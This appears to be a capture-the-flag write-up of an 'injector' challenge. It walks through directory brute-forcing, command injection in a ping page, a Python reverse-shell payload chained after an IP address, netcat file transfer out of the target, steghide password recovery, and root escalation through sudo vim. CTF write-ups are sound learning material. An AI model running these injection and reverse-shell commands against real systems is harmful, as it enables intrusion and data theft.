Opening the site, didn’t found something interesting, so, I used Gobuster to find hidden paths,

Mmm, interesting, now I go to the secret path.

Nothing interesting again, but look what it says, “default web page”? let’s try Gobuster again on /secret path.

Nice! let’s go for each path one by one.

In tools I found this, going for ping.php we find:

But how this work? let’s try to type any random IP, and it returns the output of a normal ping.

Now what to do? wait! what was the challenge name?! “injector”. That’s it, I search for a reverse shell php payload and I have found this:

127.0.0.1; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Your Ip address",Your_port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Setting netcat listener and injecting the payload and Boom!

I am in your server!

Browsing in the files and look at this

I want this image in my device to practice some bad tools on it

I will use netcat for this.

On my machine: nc -lvp 33170 > out.jpg
On the attacked device : nc MyIpAddress 33170 < TrollFace.jpg

Whta is this? anyway, using strings and exiftool, nothing looks useful, but using steghide and:

Great! the password in the paswword.txt is D0n41dTrump, mmm, whose password is this?
Of course not Donald Trump’s, maybe be it is the password for root, but it didn’t work, let’s see what users else is registered:

Mmm, who is alex, is it her password? let’s find out

But first we need to fix this

This spawns an interactive shell so we can continue,

Yeaaaaahs!

Can I go to root now? No I can’t sadly, so I need some privilege escalation
Running sudo -l

Good! I can use vim, let’s search on GTFOBins:

Let’s try this

Yeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaahs!
Easy RCE btw, anyway, going to root and using ls:

Let’s see what is inside

And it is the flag, and GG!